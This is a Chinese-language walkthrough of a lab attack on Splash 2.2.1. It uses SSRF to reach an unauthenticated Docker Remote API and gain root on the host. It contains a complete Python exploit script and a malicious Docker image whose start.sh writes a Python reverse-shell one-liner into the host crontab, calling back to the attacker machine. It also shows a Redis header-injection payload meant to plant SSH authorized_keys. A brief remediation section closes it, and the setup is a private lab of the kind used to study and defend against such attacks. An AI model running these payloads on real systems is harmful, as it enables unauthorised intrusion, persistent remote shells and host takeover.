Splash SSRF漏洞利用与内网渗透实战指南<\/h1>

0x01 漏洞概述<\/h2>
Splash是一个基于Python3、Twisted和QT5开发的JavaScript渲染服务，提供HTTP API的轻量级浏览器功能。默认监听8050(http)和5023(telnet)端口。<\/p>
漏洞核心<\/strong>：Splash允许用户提供任意URL进行页面渲染，但未对URL进行有效验证，导致存在带回显的SSRF漏洞<\/strong>。与普通SSRF不同，Splash不仅支持GET请求，还支持POST请求，这大大扩展了攻击面。<\/p>
攻击场景<\/strong>：攻击者可以利用此SSRF漏洞结合内网Docker Remote API，最终获取宿主机的root权限，实现内网漫游。<\/p>

0x02 环境搭建<\/h2>
实验环境配置<\/h3>

网络拓扑<\/strong>：<\/p>

Attacker: 192.168.1.213 (宿主机)<\/li>
Victim:

外网IP: 192.168.1.120<\/li>
内网IP: 172.16.10.74 (Host-only模式)<\/li> <\/ul> <\/li> <\/ul> <\/li>

服务部署<\/strong>：<\/p>

Splash: http:\/\/192.168.1.120:8050 (v2.2.1)<\/li>
Docker Remote API: http:\/\/172.16.10.74:2375 (17.06.0-ce)<\/li>
JIRA: http:\/\/172.16.10.74:8080<\/li> <\/ul> <\/li> <\/ol>
Docker配置关键步骤<\/h3>

修改Docker配置监听TCP 2375端口：<\/p>
# \/etc\/default\/docker添加<\/span> <\/span><\/span>DOCKER_OPTS=<\/span>"-H tcp:\/\/172.16.10.74:2375"<\/span> <\/span><\/span> <\/span><\/span># 创建并配置docker.service.d<\/span> <\/span><\/span>mkdir \/etc\/systemd\/system\/docker.service.d\/ <\/span><\/span>vim \/etc\/systemd\/system\/docker.service.d\/docker.conf <\/span><\/span><\/code><\/pre>内容为：<\/p> [Service] ExecStart= EnvironmentFile=\/etc\/default\/docker ExecStart=\/usr\/bin\/dockerd -H fd:\/\/ $DOCKER_OPTS <\/code><\/pre> <\/li> 重启Docker服务：<\/p> systemctl daemon-reload <\/span><\/span>service docker restart <\/span><\/span><\/code><\/pre><\/li> 验证监听：<\/p> netstat -antp | grep LISTEN <\/span><\/span>curl 172.16.10.74:2375 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 服务启动命令<\/h3> 启动Splash：<\/p> docker pull scrapinghub\/splash:2.2.1 <\/span><\/span>docker run --name=<\/span>splash -d -p 5023:5023 -p 8050:8050 -p 8051:8051 scrapinghub\/splash:2.2.1 <\/span><\/span><\/code><\/pre><\/li> 启动JIRA：<\/p> docker pull cptactionhank\/atlassian-jira:latest <\/span><\/span>docker run -d -p 172.16.10.74:8080:8080 --name=<\/span>jira cptactionhank\/atlassian-jira:latest <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x03 漏洞利用过程<\/h2> 1. 基本SSRF验证<\/h3> 访问Splash界面(http:\/\/192.168.1.120:8050\/)，在URL输入框填写内网地址(如http:\/\/172.16.10.74:8080)，点击"Render me!"，可获取：<\/p> 页面截图<\/li> 请求信息<\/li> 页面源码<\/li> <\/ul> 等同于一个内网浏览器，验证了SSRF漏洞的存在。<\/p> 2. Lua脚本尝试<\/h3> Splash支持执行自定义Lua脚本，但运行在沙箱环境中，默认可用的Lua模块有限：<\/p> string<\/li> table<\/li> math<\/li> os<\/li> <\/ul> 尝试通过os模块执行系统命令失败：<\/p> local<\/span> os =<\/span> require("os"<\/span>) <\/span><\/span>function<\/span> main<\/span>(splash) <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>3. 通过Docker Remote API获取宿主机root权限<\/h3> 攻击思路<\/strong>：<\/p> 利用POST请求调用Docker API<\/li> 挂载宿主机\/etc目录到容器<\/li> 通过写入crontab实现反弹shell<\/li> <\/ol> 关键步骤<\/strong>：<\/p> 1) 准备恶意Docker镜像<\/h4> Dockerfile:<\/p> FROM<\/span> busybox:latest<\/span> <\/span><\/span><\/span><\/span>ADD<\/span> .\/start.sh \/start.sh <\/span><\/span><\/span><\/span>WORKDIR<\/span> \/<\/span> <\/span><\/span><\/span><\/code><\/pre>start.sh:<\/p> #!\/bin\/sh <\/span><\/span><\/span><\/span>echo 'root python -c '<\/span>\'<\/span>'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$1\", $2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/span>\'<\/span>''<\/span> >> \/hostdir\/crontab <\/span><\/span><\/code><\/pre>构建并推送镜像：<\/p> docker build -t b1ngz\/busybox:latest . <\/span><\/span>docker push b1ngz\/busybox:latest <\/span><\/span><\/code><\/pre>2) 利用脚本实现攻击<\/h4> 完整Python利用脚本：<\/p> # -*- coding: utf-8 -*-<\/span> <\/span><\/span>import<\/span> json <\/span><\/span>import<\/span> re <\/span><\/span>import<\/span> requests <\/span><\/span> <\/span><\/span>def<\/span> pull_image<\/span>(api, docker_api, image_name, image_tag): <\/span><\/span> print("pull image: <\/span>%s<\/span>:<\/span>%s<\/span>"<\/span> %<\/span> (image_name, image_tag)) <\/span><\/span> url =<\/span> "<\/span>%s<\/span>\/render.html"<\/span> %<\/span> api <\/span><\/span> docker_url =<\/span> '<\/span>%s<\/span>\/images\/create?fromImage=<\/span>%s<\/span>&tag=<\/span>%s<\/span>'<\/span> %<\/span> (docker_api, image_name, image_tag) <\/span><\/span> params =<\/span> { <\/span><\/span> 'url'<\/span>: docker_url, <\/span><\/span> 'http_method'<\/span>: 'POST'<\/span>, <\/span><\/span> 'body'<\/span>: ''<\/span>, <\/span><\/span> 'timeout'<\/span>: 60<\/span> <\/span><\/span> } <\/span><\/span> resp =<\/span> requests.<\/span>get(url, params=<\/span>params) <\/span><\/span> <\/span><\/span>def<\/span> create_container<\/span>(api, docker_api, image_name, image_tag, shell_host, shell_port): <\/span><\/span> image =<\/span> "<\/span>%s<\/span>:<\/span>%s<\/span>"<\/span> %<\/span> (image_name, image_tag) <\/span><\/span> body =<\/span> { <\/span><\/span> "Image"<\/span>: image, <\/span><\/span> "Volumes"<\/span>: { <\/span><\/span> "\/etc"<\/span>: { <\/span><\/span> "bind"<\/span>: "\/hostdir"<\/span>, <\/span><\/span> "mode"<\/span>: "rw"<\/span> <\/span><\/span> } <\/span><\/span> }, <\/span><\/span> "HostConfig"<\/span>: { <\/span><\/span> "Binds"<\/span>: ["\/etc:\/hostdir"<\/span>] <\/span><\/span> }, <\/span><\/span> "Cmd"<\/span>: [ <\/span><\/span> '\/bin\/sh'<\/span>, <\/span><\/span> '\/start.sh'<\/span>, <\/span><\/span> shell_host, <\/span><\/span> str(shell_port), <\/span><\/span> ], <\/span><\/span> } <\/span><\/span> url =<\/span> "<\/span>%s<\/span>\/render.html"<\/span> %<\/span> api <\/span><\/span> docker_url =<\/span> '<\/span>%s<\/span>\/containers\/create'<\/span> %<\/span> docker_api <\/span><\/span> params =<\/span> { <\/span><\/span> 'http_method'<\/span>: 'POST'<\/span>, <\/span><\/span> 'url'<\/span>: docker_url, <\/span><\/span> 'timeout'<\/span>: 60<\/span> <\/span><\/span> } <\/span><\/span> resp =<\/span> requests.<\/span>post(url, params=<\/span>params, json=<\/span>{ <\/span><\/span> 'headers'<\/span>: {'Content-Type'<\/span>: 'application\/json'<\/span>}, <\/span><\/span> "body"<\/span>: json.<\/span>dumps(body) <\/span><\/span> }) <\/span><\/span> result =<\/span> re.<\/span>search('"Id":"(\w+)"'<\/span>, resp.<\/span>text) <\/span><\/span> container_id =<\/span> result.<\/span>group(1<\/span>) <\/span><\/span> return<\/span> container_id <\/span><\/span> <\/span><\/span>def<\/span> start_container<\/span>(api, docker_api, container_id): <\/span><\/span> url =<\/span> "<\/span>%s<\/span>\/render.html"<\/span> %<\/span> api <\/span><\/span> docker_url =<\/span> '<\/span>%s<\/span>\/containers\/<\/span>%s<\/span>\/start'<\/span> %<\/span> (docker_api, container_id) <\/span><\/span> params =<\/span> { <\/span><\/span> 'http_method'<\/span>: 'POST'<\/span>, <\/span><\/span> 'url'<\/span>: docker_url, <\/span><\/span> 'timeout'<\/span>: 10<\/span> <\/span><\/span> } <\/span><\/span> resp =<\/span> requests.<\/span>post(url, params=<\/span>params, json=<\/span>{ <\/span><\/span> 'headers'<\/span>: {'Content-Type'<\/span>: 'application\/json'<\/span>}, <\/span><\/span> "body"<\/span>: ""<\/span> <\/span><\/span> }) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> # 配置参数<\/span> <\/span><\/span> splash_host =<\/span> '192.168.1.120'<\/span> <\/span><\/span> splash_port =<\/span> 8050<\/span> <\/span><\/span> docker_host =<\/span> '172.16.10.74'<\/span> <\/span><\/span> docker_port =<\/span> 2375<\/span> <\/span><\/span> shell_host =<\/span> '192.168.1.213'<\/span> <\/span><\/span> shell_port =<\/span> 12345<\/span> <\/span><\/span> <\/span><\/span> splash_api =<\/span> "http:\/\/<\/span>%s<\/span>:<\/span>%d<\/span>"<\/span> %<\/span> (splash_host, splash_port) <\/span><\/span> docker_api =<\/span> 'http:\/\/<\/span>%s<\/span>:<\/span>%d<\/span>'<\/span> %<\/span> (docker_host, docker_port) <\/span><\/span> image_name =<\/span> 'b1ngz\/busybox'<\/span> <\/span><\/span> image_tag =<\/span> 'latest'<\/span> <\/span><\/span> <\/span><\/span> # 执行攻击步骤<\/span> <\/span><\/span> pull_image(splash_api, docker_api, image_name, image_tag) <\/span><\/span> container_id =<\/span> create_container(splash_api, docker_api, image_name, image_tag, shell_host, shell_port) <\/span><\/span> start_container(splash_api, docker_api, container_id) <\/span><\/span><\/code><\/pre>关键点说明<\/strong>：<\/p> 必须使用POST方法请求render.html接口<\/li> Headers需要在body中以JSON格式传递<\/li> 攻击流程分为三步：拉取镜像、创建容器、启动容器<\/li> <\/ol> 4. 其他利用思路<\/h3> Redis利用尝试<\/h4> 虽然Splash基于QTWebKit默认不支持gopher协议，但测试发现请求headers可控且支持\n换行，可尝试攻击Redis：<\/p> def<\/span> test_get<\/span>(api, redis_api): <\/span><\/span> url =<\/span> "<\/span>%s<\/span>\/render.html"<\/span> %<\/span> api <\/span><\/span> params =<\/span> { <\/span><\/span> 'url'<\/span>: redis_api, <\/span><\/span> 'timeout'<\/span>: 10<\/span> <\/span><\/span> } <\/span><\/span> resp =<\/span> requests.<\/span>post(url, params=<\/span>params, json=<\/span>{ <\/span><\/span> 'headers'<\/span>: { <\/span><\/span> 'config set dir \/root<\/span>\n<\/span>'<\/span> <\/span><\/span> 'config set dbfilename authorized_keys<\/span>\n<\/span>'<\/span>: ''<\/span> <\/span><\/span> } <\/span><\/span> }) <\/span><\/span><\/code><\/pre>实际测试发现Redis 3.2.8会发出安全警告并中断连接，但部分命令已执行。<\/p> 0x04 修复方案<\/h2> 1. Splash修复<\/h3> 添加认证机制<\/strong>：<\/p> 临时方案：使用Basic认证<\/li> 彻底修复：修改代码实现完善的认证功能<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 对用户提供的URL进行严格验证<\/li> 限制可访问的网络范围<\/li> <\/ul> <\/li> <\/ol> 2. Docker安全配置<\/h3> 端口保护<\/strong>：<\/p> 使用iptables限制2375\/2376端口访问<\/li> 仅允许管理节点访问工作节点的端口<\/li> 管理节点端口设置IP白名单<\/li> <\/ul> <\/li> 版本升级<\/strong>：<\/p> 使用最新稳定版Docker<\/li> 启用TLS认证<\/li> <\/ul> <\/li> <\/ol> 0x05 攻击流程总结<\/h2> 发现Splash SSRF漏洞<\/li> 利用POST请求能力探测内网服务<\/li> 发现Docker Remote API未授权访问<\/li> 构造恶意Docker镜像并推送至Docker Hub<\/li> 通过SSRF调用Docker API拉取镜像<\/li> 创建并启动容器，挂载宿主机\/etc目录<\/li> 通过写入crontab实现定时任务反弹shell<\/li> 获取宿主机root权限，实现内网漫游<\/li> <\/ol> 附录：技术要点备忘<\/h2> Splash API关键参数<\/strong>：<\/p> url: 请求的目标URL<\/li> http_method: 请求方法(GET\/POST)<\/li> headers: 请求头(需在body中以JSON传递)<\/li> body: 请求体<\/li> timeout: 超时时间<\/li> <\/ul> <\/li> Docker Remote API关键端点<\/strong>：<\/p> POST \/images\/create - 拉取镜像<\/li> POST \/containers\/create - 创建容器<\/li> POST \/containers\/(id)\/start - 启动容器<\/li> <\/ul> <\/li> 反弹Shell原理<\/strong>：<\/p> 通过python -c执行socket连接<\/li> 将标准输入\/输出\/错误重定向到socket<\/li> 通过crontab实现持久化<\/li> <\/ul> <\/li> 漏洞利用难点<\/strong>：<\/p> 必须使用POST方法请求render.html<\/li> Headers需要在body中以JSON格式传递<\/li> Docker API调用需要构造正确的JSON数据<\/li> <\/ul> <\/li> <\/ol>